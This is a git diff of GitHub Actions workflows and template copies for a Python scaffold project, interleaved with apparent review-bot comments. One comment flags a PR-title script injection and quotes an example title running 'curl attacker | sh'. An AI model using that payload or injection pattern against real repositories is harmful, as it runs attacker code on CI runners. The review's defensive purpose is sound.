diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 94a53a71..95ea2a6c 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -6,6 +6,9 @@ on:
 branches:
 - main
+permissions:
+ contents: read
+
 concurrency:
 cancel-in-progress: true
 group: ${{ github.workflow }}-${{ github.ref }}
@@ -42,11 +45,11 @@ jobs:
 # renovate: github-runner
 - windows-2025
 python-version:
- '3.9'
- - '3.10'
- - '3.11'
- - '3.12'
- - '3.13'
+ - "3.9"
+ - "3.10"
+ - "3.11"
+ - "3.12"
+ - "3.13"
 consistency:
 if: ${{ !cancelled() && ! failure() }}
 runs-on: ubuntu-24.04
diff --git a/.github/workflows/commitlint.yml b/.github/workflows/commitlint.yml
index 90228950..f62e452c 100644
--- a/.github/workflows/commitlint.yml
+++ b/.github/workflows/commitlint.yml
@@ -1,7 +1,23 @@
 name: CommitLint
+
+on:
+ pull_request:
+ types:
+ - opened
+ - synchronize
+ - reopened
+ - edited
+ push:
+ branches:
+ - main
+
+permissions:
+ contents: read
+
 concurrency:
 cancel-in-progress: true
 group: ${{ github.workflow }}-${{ github.ref }}
+
 jobs:
 commitlint:
 container:
@@ -15,13 +31,3 @@ jobs:
 - name: Validate pull request title with commitlint
 if: github.event_name == 'pull_request'
 run: echo "${{ github.event.pull_request.title }}" | npx commitlint -x @commitlint/config-conventional
-on:
- pull_request:
- types:
- - opened
- - synchronize
- - reopened
- - edited
- push:
- branches:
- - main
diff --git a/.github/workflows/readthedocs-preview.yml b/.github/workflows/readthedocs-preview.yml
index 3ea507b9..3636dab4 100644
--- a/.github/workflows/readthedocs-preview.yml
+++ b/.github/workflows/readthedocs-preview.yml
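Review bot: The `run:` step kept as context in the second commitlint hunk interpolates `${{ github.event.pull_request.title }}` straight into the shell command, so a pull request title such as `x"; curl attacker | sh; echo "` from a fork executes on the runner; the new workflow-level `permissions: contents: read` limits what the token can do but does not close the injection. Pass the title through the environment instead, `env: PR_TITLE: ${{ github.event.pull_request.title }}` on the step and `run: echo "$PR_TITLE" | npx commitlint -x @commitlint/config-conventional`, so the value is never re-parsed by bash. The `npx commitlint -x @commitlint/config-conventional` call also resolves both packages unpinned at run time; pinning exact versions (or installing from the project's lockfile) would keep this step reproducible. The enclosing `commitlint` job, including its `container:` and earlier steps, begins outside the hunk.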
@@ -1,15 +1,5 @@
 name: Read the Docs Pull Request Preview
-concurrency:
- cancel-in-progress: true
- group: ${{ github.workflow }}-${{ github.ref }}
-jobs:
- documentation-links:
- runs-on: ubuntu-24.04
- steps:
- - name: Add Read the Docs preview's link to pull request
- uses: readthedocs/actions/preview@b8bba1484329bda1a3abe986df7ebc80a8950333 # v1.5
- with:
- project-slug: ss-python
+
 on:
 pull_request_target:
 types:
@@ -22,5 +12,19 @@ on:
 - docs/**
 - pdm.dev.lock
 - pdm.lock
+
 permissions:
 pull-requests: write
+
+concurrency:
+ cancel-in-progress: true
+ group: ${{ github.workflow }}-${{ github.ref }}
+
+jobs:
+ documentation-links:
+ runs-on: ubuntu-24.04
+ steps:
+ - name: Add Read the Docs preview's link to pull request
+ uses: readthedocs/actions/preview@b8bba1484329bda1a3abe986df7ebc80a8950333 # v1.5
+ with:
+ project-slug: ss-python
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 40a44fcc..b3bcd3a8 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -5,6 +5,9 @@ on:
 types:
 - published
+permissions:
+ contents: read
+
 concurrency:
 cancel-in-progress: true
 group: ${{ github.workflow }}-${{ github.ref }}
@@ -21,7 +24,7 @@ jobs:
 uses: pdm-project/setup-pdm@deb8d8a4e2a03aabcef6f2cc981923fc6b29ef99 # v4.3
 with:
 cache: true
- python-version: '3.12'
+ python-version: "3.12"
 version: 2.24.1
 cache-dependency-path: |
 ./pdm.dev.lock
@@ -111,11 +114,11 @@ jobs:
 strategy:
 matrix:
 python-version:
- '3.9'
- - '3.10'
- - '3.11'
- - '3.12'
- - '3.13'
+ - "3.9"
+ - "3.10"
+ - "3.11"
+ - "3.12"
+ - "3.13"
 package-publish:
 runs-on: ubuntu-24.04
 permissions:
@@ -128,7 +131,7 @@ jobs:
 uses: pdm-project/setup-pdm@deb8d8a4e2a03aabcef6f2cc981923fc6b29ef99 # v4.3
 with:
 cache: true
- python-version: '3.12'
+ python-version: "3.12"
 version: 2.24.1
 cache-dependency-path: |
 ./pdm.dev.lock
diff --git a/.github/workflows/renovate.yml b/.github/workflows/renovate.yml
index 1f940db8..660ea5ae 100644
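Review bot: The moved `concurrency` block in the readthedocs-preview hunk keys its group on `github.ref`, but under `pull_request_target` that expression resolves to the base branch (`refs/heads/main`), so every open pull request lands in the same group and the preview-link job for one PR cancels the in-flight job of another. Key the group on the PR instead, `group: ${{ github.workflow }}-${{ github.event.pull_request.number }}`. Because `pull_request_target` runs with the base repository's token and this workflow grants `pull-requests: write`, the job is safe only as long as it never checks out or executes code from the PR head; the moved job currently only calls the pinned `readthedocs/actions/preview` action, and a comment above `steps:` such as `# pull_request_target: never check out or run PR-head code in this job` would keep a later step from breaking that invariant.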
--- a/.github/workflows/renovate.yml
+++ b/.github/workflows/renovate.yml
@@ -1,4 +1,16 @@
 name: Renovate
+
+on:
+ schedule:
+ # * is a special character in YAML so you have to quote this string
+ - cron: "*/15 0-3 * * 1"
+ workflow_dispatch: null
+
+permissions:
+ contents: read
+ issues: write
+ pull-requests: write
+
 jobs:
 renovate:
 container:
@@ -46,8 +58,3 @@ jobs:
 else
 renovate $RENOVATE_EXTRA_FLAG
 fi
-on:
- schedule:
- # * is a special character in YAML so you have to quote this string
- - cron: "*/15 0-3 * * 1"
- workflow_dispatch: null
diff --git a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/ci.yml.jinja b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/ci.yml.jinja
index 15b7f5cf..0a2eb33b 100644
--- a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/ci.yml.jinja
+++ b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/ci.yml.jinja
@@ -7,6 +7,9 @@ on:
 branches:
 - main
+permissions:
+ contents: read
+
 concurrency:
 cancel-in-progress: true
 group: {{ '${{ github.workflow }}-${{ github.ref }}' }}
@@ -50,19 +53,19 @@ jobs:
 {% endif %}
 python-version:
 {% if version_between("3.9", min_py, max_py) %}
- - '3.9'
+ - "3.9"
 {% endif %}
 {% if version_between("3.10", min_py, max_py) %}
- - '3.10'
+ - "3.10"
 {% endif %}
 {% if version_between("3.11", min_py, max_py) %}
- - '3.11'
+ - "3.11"
 {% endif %}
 {% if version_between("3.12", min_py, max_py) %}
- - '3.12'
+ - "3.12"
 {% endif %}
 {% if version_between("3.13", min_py, max_py) %}
- - '3.13'
+ - "3.13"
 {% endif %}
 {% if project_name == "Serious Scaffold Python" %}
 consistency:
diff --git a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/commitlint.yml b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/commitlint.yml
index 90228950..f62e452c 100644
--- a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/commitlint.yml
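Review bot: The new `permissions` block in the renovate hunk grants the workflow's `GITHUB_TOKEN` `issues: write` and `pull-requests: write`, but nothing in the hunk shows Renovate using that token; the `renovate $RENOVATE_EXTRA_FLAG` call kept as context in the following hunk is presumably configured through the job's `container:` and environment, which lie outside the hunk. If Renovate authenticates with its own app or PAT token (the usual setup, since pull requests opened with `GITHUB_TOKEN` do not trigger other workflows such as CI), both write scopes are unused and the block should shrink to `permissions: contents: read`. If the job does rely on `GITHUB_TOKEN`, a comment above the block, `# GITHUB_TOKEN needs issues/pull-requests write so Renovate can open dependency PRs and the dashboard issue`, would record why the write scopes exist.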
+++ b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/commitlint.yml
@@ -1,7 +1,23 @@
 name: CommitLint
+
+on:
+ pull_request:
+ types:
+ - opened
+ - synchronize
+ - reopened
+ - edited
+ push:
+ branches:
+ - main
+
+permissions:
+ contents: read
+
 concurrency:
 cancel-in-progress: true
 group: ${{ github.workflow }}-${{ github.ref }}
+
 jobs:
 commitlint:
 container:
@@ -15,13 +31,3 @@ jobs:
 - name: Validate pull request title with commitlint
 if: github.event_name == 'pull_request'
 run: echo "${{ github.event.pull_request.title }}" | npx commitlint -x @commitlint/config-conventional
-on:
- pull_request:
- types:
- - opened
- - synchronize
- - reopened
- - edited
- push:
- branches:
- - main
diff --git a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/readthedocs-preview.yml.jinja b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/readthedocs-preview.yml.jinja
index dcd5a01a..6a48cbd5 100644
--- a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/readthedocs-preview.yml.jinja
+++ b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/readthedocs-preview.yml.jinja
@@ -1,15 +1,5 @@
 name: Read the Docs Pull Request Preview
-concurrency:
- cancel-in-progress: true
- group: {{ '${{ github.workflow }}-${{ github.ref }}' }}
-jobs:
- documentation-links:
- runs-on: ubuntu-24.04
- steps:
- - name: Add Read the Docs preview's link to pull request
- uses: readthedocs/actions/preview@b8bba1484329bda1a3abe986df7ebc80a8950333 # v1.5
- with:
- project-slug: {{ repo_name }}
+
 on:
 pull_request_target:
 types:
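Review bot: The template's commitlint `run:` step, kept as context in its second hunk, still expands `${{ github.event.pull_request.title }}` inside the shell command, so every repository generated from this template inherits a script-injection point that a fork's PR title can trigger; the added `permissions: contents: read` narrows the token but does not stop the injected commands from running. Move the title into an environment variable, `env: PR_TITLE: ${{ github.event.pull_request.title }}` on the step and `run: echo "$PR_TITLE" | npx commitlint -x @commitlint/config-conventional`, which is the form GitHub's own hardening guidance recommends. Consider pinning the versions of `commitlint` and `@commitlint/config-conventional` that `npx` fetches as well, since this template fixes them for every downstream project. The rest of the `commitlint` job, including its `container:`, sits outside the hunk.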
@@ -22,5 +12,19 @@ on:
 - docs/**
 - pdm.dev.lock
 - pdm.lock
+
 permissions:
 pull-requests: write
+
+concurrency:
+ cancel-in-progress: true
+ group: {{ '${{ github.workflow }}-${{ github.ref }}' }}
+
+jobs:
+ documentation-links:
+ runs-on: ubuntu-24.04
+ steps:
+ - name: Add Read the Docs preview's link to pull request
+ uses: readthedocs/actions/preview@b8bba1484329bda1a3abe986df7ebc80a8950333 # v1.5
+ with:
+ project-slug: {{ repo_name }}
diff --git a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/release.yml.jinja b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/release.yml.jinja
index 60d1bb81..c9a027a0 100644
--- a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/release.yml.jinja
+++ b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/release.yml.jinja
@@ -6,6 +6,9 @@ on:
 types:
 - published
+permissions:
+ contents: read
+
 concurrency:
 cancel-in-progress: true
 group: {{ '${{ github.workflow }}-${{ github.ref }}' }}
@@ -22,7 +25,7 @@ jobs:
 uses: pdm-project/setup-pdm@deb8d8a4e2a03aabcef6f2cc981923fc6b29ef99 # v4.3
 with:
 cache: true
- python-version: '{{ default_py }}'
+ python-version: "{{ default_py }}"
 version: 2.24.1
 cache-dependency-path: |
 ./pdm.dev.lock
@@ -113,19 +116,19 @@ jobs:
 matrix:
 python-version:
 {% if version_between("3.9", min_py, max_py) %}
- - '3.9'
+ - "3.9"
 {% endif %}
 {% if version_between("3.10", min_py, max_py) %}
- - '3.10'
+ - "3.10"
 {% endif %}
 {% if version_between("3.11", min_py, max_py) %}
- - '3.11'
+ - "3.11"
 {% endif %}
 {% if version_between("3.12", min_py, max_py) %}
- - '3.12'
+ - "3.12"
 {% endif %}
 {% if version_between("3.13", min_py, max_py) %}
- - '3.13'
+ - "3.13"
 {% endif %}
 package-publish:
 runs-on: ubuntu-24.04
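Review bot: The moved `concurrency` block in the readthedocs-preview template keys on `github.ref`, which for a `pull_request_target` run is the base branch rather than the pull request, so all open PRs in a generated repository share one cancellation group and a new PR's preview-link job cancels another PR's run. Render the group from the PR number instead, `group: {{ '${{ github.workflow }}-${{ github.event.pull_request.number }}' }}`, keeping the outer Jinja quoting so the expression reaches the generated file intact. Since this job runs with the base repository's token and `pull-requests: write`, a comment above `steps:`, `# pull_request_target: never check out or run PR-head code in this job`, would warn downstream maintainers not to add a checkout of the PR head to it.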
@@ -139,7 +142,7 @@ jobs:
 uses: pdm-project/setup-pdm@deb8d8a4e2a03aabcef6f2cc981923fc6b29ef99 # v4.3
 with:
 cache: true
- python-version: '{{ default_py }}'
+ python-version: "{{ default_py }}"
 version: 2.24.1
 cache-dependency-path: |
 ./pdm.dev.lock
diff --git a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/renovate.yml.jinja b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/renovate.yml.jinja
index 7fe17e51..84d38d22 100644
--- a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/renovate.yml.jinja
+++ b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/renovate.yml.jinja
@@ -1,4 +1,16 @@
 name: Renovate
+
+on:
+ schedule:
+ # * is a special character in YAML so you have to quote this string
+ - cron: "*/15 0-3 * * 1"
+ workflow_dispatch: null
+
+permissions:
+ contents: read
+ issues: write
+ pull-requests: write
+
 jobs:
 renovate:
 container:
@@ -50,8 +62,3 @@ jobs:
 else
 renovate $RENOVATE_EXTRA_FLAG
 fi
-on:
- schedule:
- # * is a special character in YAML so you have to quote this string
- - cron: "*/15 0-3 * * 1"
- workflow_dispatch: null
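Review bot: The `permissions` block added to the renovate template hands `GITHUB_TOKEN` `issues: write` and `pull-requests: write` to every generated repository, yet the hunk gives no sign that Renovate runs with that token; the `renovate $RENOVATE_EXTRA_FLAG` line kept as context in the second hunk suggests its credentials are set up in the job's `container:` or environment, which are outside the hunk. If the template expects an app or PAT token, as is typical because PRs opened with `GITHUB_TOKEN` never trigger CI, these write scopes are dead weight in every downstream project and the block should be reduced to `permissions: contents: read`. If `GITHUB_TOKEN` is in fact the Renovate credential, document it in place, `# GITHUB_TOKEN needs issues/pull-requests write so Renovate can open dependency PRs and the dashboard issue`, so a future reviewer does not strip the scopes.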